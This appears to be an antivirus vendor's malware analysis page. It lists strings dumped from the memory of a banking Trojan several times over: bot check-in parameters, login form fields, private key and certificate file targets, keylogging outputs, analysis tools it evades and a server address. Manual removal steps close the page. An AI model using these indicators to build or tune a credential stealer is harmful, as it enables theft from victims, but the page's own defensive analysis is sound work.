VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryW

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

ActivateKeyboardLayout

SetKeyboardState

GetKeyboardLayoutList

EnumChildWindows

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanExW

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegQueryInfoKeyW

RegOpenKeyExW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

6f6C6

8 8$8(8,8

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

MSCTF.Shared.MUTEX.x

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

.Prev

.current

HighMemoryEvent_x

winlogon.exe_716_rwx_01C40000_000C6000:

.text

`.rdata

@.data

@.reloc

<>http

SSSh  

PASSu:8V

PASSu-8V

PSSSSSSSh

t%F;5

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.5.11

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryW

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

ActivateKeyboardLayout

SetKeyboardState

GetKeyboardLayoutList

EnumChildWindows

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanExW

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegQueryInfoKeyW

RegOpenKeyExW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

SYSTEM!XP9!F9BE9A8A

%WinDir%\apppatch\hwcmqr.exe

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

6f6C6

8 8$8(8,8

`.data

.reloc

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

MSCTF.Shared.MUTEX.x

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

.Prev

.current

HighMemoryEvent_x

Explorer.EXE_840_rwx_01F00000_00061000:

.text

`.data

.reloc

`.rdata

@.data

@.reloc

<>http

SSSh  

PASSu:8V

PASSu-8V

PSSSSSSSh

t%F;5

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.5.11

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryW

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

ActivateKeyboardLayout

SetKeyboardState

GetKeyboardLayoutList

EnumChildWindows

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanExW

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegQueryInfoKeyW

RegOpenKeyExW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

6f6C6

8 8$8(8,8

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

MSCTF.Shared.MUTEX.x

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

.Prev

.current

HighMemoryEvent_x

Explorer.EXE_840_rwx_01F70000_00068000:

.text

`.rdata

@.data

@.reloc

<>http

SSSh  

PASSu:8V

PASSu-8V

PSSSSSSSh

t%F;5

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.5.11

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryW

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

ActivateKeyboardLayout

SetKeyboardState

GetKeyboardLayoutList

EnumChildWindows

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanExW

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegQueryInfoKeyW

RegOpenKeyExW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

ADM!XP9!F9BE9A8A

%WinDir%\apppatch\hwcmqr.exe

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

6f6C6

8 8$8(8,8

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

MSCTF.Shared.MUTEX.x

Desk_%ux

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

.Prev

.current

HighMemoryEvent_x

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   mscorsvw.exe:1912
   %original file name%.exe:1500
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\AppPatch\hwcmqr.exe (1983 bytes)
   %System%\config\software (1609 bytes)
   %System%\config\SOFTWARE.LOG (3715 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.